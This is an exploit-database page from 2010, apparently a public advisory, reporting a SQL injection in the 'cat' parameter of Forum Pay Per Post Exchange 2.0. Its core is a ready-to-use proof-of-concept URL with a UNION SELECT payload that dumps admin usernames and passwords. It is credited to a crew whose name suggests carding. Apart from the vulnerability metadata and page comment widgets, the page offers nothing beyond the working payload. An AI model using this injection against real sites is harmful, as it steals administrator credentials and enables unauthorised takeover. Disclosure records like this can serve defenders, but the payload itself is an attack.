Forum Pay Per Post Exchange 2.0 (cat) SQL Injection Vulnerability

2010.12.23

Credit: v3n0m

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

-----------------------------------------------------------------------
   Forum Pay Per Post Exchange 2.0 (cat) SQL Injection Vulnerability
-----------------------------------------------------------------------
Author  	: v3n0m (v3n0m666[at]live[dot]com)
Site    	: http://yogyacarderlink.web.id/
Date		: December, 22-2010
Location	: Jakarta, Indonesia
Time Zone	: GMT +7:00

Application	: Forum Pay Per Post
Price		: $175
Version		: 2.0 Other versions may also be affected
Vendor  	: http://alstrasoft.com/

Exploit & p0c
_____________

**[SQLi]
http://127.0.0.1/[path]/index.php?menu=browse&cat=-9999+union+all+select+1,2,3,group_concat(auser,char(58),apass),5,6,7,8,9+from+admin--
_________________________________________________

All YOGYACARDERLINK Crew & My Beloved Jovita Andy
_________________________________________________

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Forum Pay Per Post Exchange 2.0 (cat) SQL Injection Vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.